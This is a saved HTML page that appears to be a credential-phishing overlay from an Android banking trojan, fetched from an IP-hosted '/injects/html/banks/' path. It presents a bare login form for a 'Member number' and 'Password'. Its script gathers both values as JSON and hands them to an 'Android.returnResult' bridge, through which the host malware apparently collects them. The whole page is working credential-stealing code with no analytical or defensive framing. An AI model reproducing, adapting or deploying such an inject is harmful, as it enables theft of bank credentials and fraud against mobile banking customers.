<!DOCTYPE html>
<!-- saved from url=(0074)http://193.106.191.116:8081//injects/html/banks/com.fusion.ATMLocator.html -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>fusion</title>
    <link rel="shortcut icon" href="http://193.106.191.116:8081//injects/html/banks/com.fusion.ATMLocator.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
</head>
<body>

<style type="text/css">
    body {
        background: #fff;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
        background-size: 100%;
    }
    .logo {
text-align: center;
    background-size: 100%;
    padding: 20px 0px 0px 0px;
    background: none;
    color: #fff;
    font-weight: 400;
    text-decoration: none;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 10px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 0px 0px 0px 0px;
    color: #bebebe;
    text-align: left;
    outline: none;
    border: none;
    background: no-repeat;
}
input[type="button"] {
    left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #000;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #fff;
    border-radius: 30px;
}
button {
    left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #000;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #fff;
    border-radius: 30px;
}
fieldset span {
    display: inline-block;
    text-align: center;
    color: #4b4949;
    left: 0;
    right: 0;
    padding-top: 30px;
}
fieldset p {
    display: inline-block;
    left: 0;
    right: 0;
    color: #088f0d;
}
.logo span {
    display: inline-block;
    float: left;
    padding: 40px 0px 0px 20px;
    font-size: 20px;
    color: #fff;
    font-weight: 600;
}
input::placeholder {
    color: #bebebe;
    font-size: 15px;
}
input[type="checkbox"] {
    display: none;
}

/* стили для метки */
input[type="checkbox"] + label {
    cursor: pointer;
    padding-left: 50px;
    position: relative;
    font-family: tahoma, sans-serif, arial;
    line-height: 40px;
}

/* стили для поля с бегунком*/
input[type="checkbox"] + label::before {
content: "";
    display: inline-block;
    position: absolute;
    top: 0;
    left: 0;
    vertical-align: middle;
    padding: 0;
    height: 24px;
    width: 45px;
    margin: 0 5px 0 0;
    border: 1px solid #cacaca;
    border-radius: 12px;
    background: none;
}

/* стили для бегунка*/
input[type="checkbox"] + label::after {
    content: "";
    display: block;
    position: absolute;
    top: 1px;
    left: 1px;
    width: 22px;
    height: 22px;
    border-radius: 22px;
    background: #ffffff;
    border: 1px solid #cacaca;
    box-shadow: 0 3px 3px rgba(140, 140, 140, .1);
}

/* плавность )) */
input[type="checkbox"] + label::before,
input[type="checkbox"] + label::after {
    -webkit-transition: all .2s ease-out;
    transition: all .2s ease-out;
}


input[type="checkbox"]:checked + label::after {
    left: 22px;
}
</style>


<fieldset id="formtosend">

<div class="" id="log" style="display: block;">

<div class="logo">

</div>

<div class="area" style="background: none; padding: 30px; border-radius: 3px;">
        <input type="text" name="login" id="login" placeholder="Member number" style="height: 50px; border-bottom:1px solid #bebebe;">
        <input type="password" name="password" id="password" placeholder="Password" style="height: 50px; border-bottom:1px solid #bebebe;">
        <input name="exit" type="hidden" text="true">
        <button onclick="send_form()" style="position: relative;max-width: 100px;padding: 50px;float: none; border-radius: 50%; background: #CDDC39;"><span style="display: inline; font-size: 30px; position: relative; top: -15px; left: -13px;">→</span></button>
</div>

</div>

</fieldset> 

<script>
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
if (document.getElementById("login").value == '')
{
    alert ('All fields required!');
    return false;
}
if (document.getElementById("password").value == '')
{
    alert ('All fields required!');
    return false;
}
    var form = document.getElementById('formtosend');
    Android.returnResult( formToJSONbyName(form) );
}
</script>


</body></html>